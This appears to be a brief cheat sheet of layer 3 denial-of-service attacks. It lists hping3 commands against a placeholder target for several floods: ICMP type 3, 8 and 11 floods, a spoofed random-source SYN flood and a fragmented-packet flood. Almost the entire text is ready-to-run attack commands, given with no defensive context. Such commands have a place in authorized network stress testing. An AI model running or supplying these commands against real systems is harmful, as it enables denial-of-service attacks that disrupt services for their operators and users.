Layer 3

ICMP Destination Unreachable (Type 3) Flood

hping3 --icmp --icmptype 3 <target-host>

sudo hping3 -1 -i u1000 <target-host>

ICMP Ping (Type 8) Flood

hping3 --icmp --icmptype 8 <target-host>

Malformed IP Flood

hping3 -S --rand-source --flood <target-host>

IP Fragmented Flood

hping3 -S -f --flood <target-host>

ICMP Time Exceeded (Type 11) Flood

hping3 --icmp --icmptype 11 <target-host>

Reference:

Last updated